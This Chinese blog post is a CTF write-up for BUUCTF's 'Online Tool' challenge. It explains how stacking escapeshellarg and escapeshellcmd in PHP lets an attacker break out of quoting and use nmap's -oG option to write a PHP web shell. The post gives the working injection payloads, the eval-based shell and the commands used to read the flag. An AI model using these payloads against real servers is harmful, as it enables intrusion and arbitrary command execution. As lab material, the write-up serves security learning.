BUUCTF:[BUUCTF 2018]Online Tool – buu刷题笔记

08111
图片[1]-BUUCTF:[BUUCTF 2018]Online Tool – buu刷题笔记-安全小天地

打开可以看见是代码审计,我们看看代码

<?php

if (isset($_SERVER[\'HTTP_X_FORWARDED_FOR\'])) {
    $_SERVER[\'REMOTE_ADDR\'] = $_SERVER[\'HTTP_X_FORWARDED_FOR\'];
}

if(!isset($_GET[\'host\'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET[\'host\'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5(\"glzjin\". $_SERVER[\'REMOTE_ADDR\']);
    echo \'you are in sandbox \'.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system(\"nmap -T5 -sT -Pn --host-timeout 2 -F \".$host);
}

escapeshellarg

(PHP 4 >= 4.0.3, PHP 5, PHP 7, PHP 8)

escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数

说明

escapeshellarg(string $arg): string

escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。对于用户输入的部分参数就应该使用这个函数。shell 函数包含 exec(), system() 执行运算符 。

escapeshellcmd

(PHP 4, PHP 5, PHP 7, PHP 8)

escapeshellcmd — shell 元字符转义

说明

escapeshellcmd(string $command): string

escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec() 或 system() 函数,或者 执行操作符 之前进行转义。

反斜线(\\)会在以下字符之前插入: &#;`|*?~<>^()[]{}$\\\\x0A 和 \\xFF。 \' 和 \" 仅在不配对儿的时候被转义。 在 Windows 平台上,所有这些字符以及 % 和 ! 字符都会被空格代替。

利用escapeshellarg()+escapeshellcmd()的两次转义,导致闭合单引号后即可执行任意参数,然后利用Nmap的-oG参数写入shell

?host=\'<?php phpinfo();?> -oG 1.php \'

?host=\'<?php eval($_POST[\"cmd\"]);?> -oG shell.php \'

然后可以使用蚁剑链接,也可以直接使用hackerbar传入post参数获取flag

这里写一下post参数,需要加上随机生成的文件地址

you are in sandbox bfdd2bcef2d3227e6488d853d524a31dStarting Nmap 7.70 ( https://nmap.org ) at 2022-06-02 09:39 UTC Nmap done: 0 IP addresses (0 hosts up) scanned in 0.50 seconds Nmap done: 0 IP addresses (0 hosts up) scanned in 0.50 seconds

例如这个标红的就是随机生成的一个地址

因此,最后生成的地址为

http://e95404bc-ff0c-46cc-8ca8-2455bcdc5f2f.node4.buuoj.cn:81/bfdd2bcef2d3227e6488d853d524a31d/shell.php
cmd=phpinfo();  #测试shell成功上传没有
cmd=system(\"cat /flag\"); #获取flag

最终获取flag为flag{fd809798-1d4d-4eeb-ba94-c04fabd435fe}

------本文已结束,感谢您的阅读------
THE END
技术教程
# 白帽黑客# buu刷题# buu笔记# buuctf# :[BUUCTF 2018]# Online Tool
喜欢就支持一下吧
点赞11 分享
C语言教程的头像,网络安全爱好者中心-神域博客网
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞,网络安全爱好者中心-神域博客网
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞
10个月前 597
Chaitin/xray1.9.3最新社区高级版 包含722POC 附license,网络安全爱好者中心-神域博客网
Chaitin/xray1.9.3最新社区高级版 包含722POC 附license
Chaitin/xray1.9.3最新社区高级版 包含722POC 附license
10个月前 365
记一次常规安全监测发现的挂马暗链,网络安全爱好者中心-神域博客网
记一次常规安全监测发现的挂马暗链
记一次常规安全监测发现的挂马暗链
10个月前 337
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞,网络安全爱好者中心-神域博客网
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞
10个月前 309
【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】,网络安全爱好者中心-神域博客网
【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】
【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】
10个月前 289
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞,网络安全爱好者中心-神域博客网
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞
10个月前 264
相关推荐
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞,网络安全爱好者中心-神域博客网
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞
漏洞复现 深信服下一代防火墙NGAF login远程命令执行漏洞
10个月前 597
记一次常规安全监测发现的挂马暗链,网络安全爱好者中心-神域博客网
记一次常规安全监测发现的挂马暗链
记一次常规安全监测发现的挂马暗链
10个月前 337
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞,网络安全爱好者中心-神域博客网
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞
漏洞复现 JeecgBoot 企业级低代码平台 qurestSql SQL注入漏洞
10个月前 309
【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】,网络安全爱好者中心-神域博客网
【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】
【漏洞复现】WinRAR代码执行漏洞CVE-2023-38831复现【附exp】
10个月前 289
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞,网络安全爱好者中心-神域博客网
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞
金蝶OA Apusic应用服务器(中间件) server_file 目录遍历漏洞
10个月前 264
docker pull拉取超时的解决方案_docker,网络安全爱好者中心-神域博客网
docker pull拉取超时的解决方案_docker
docker pull拉取超时的解决方案_docker
10个月前 196
评论 抢沙发

请登录后发表评论

    暂无评论内容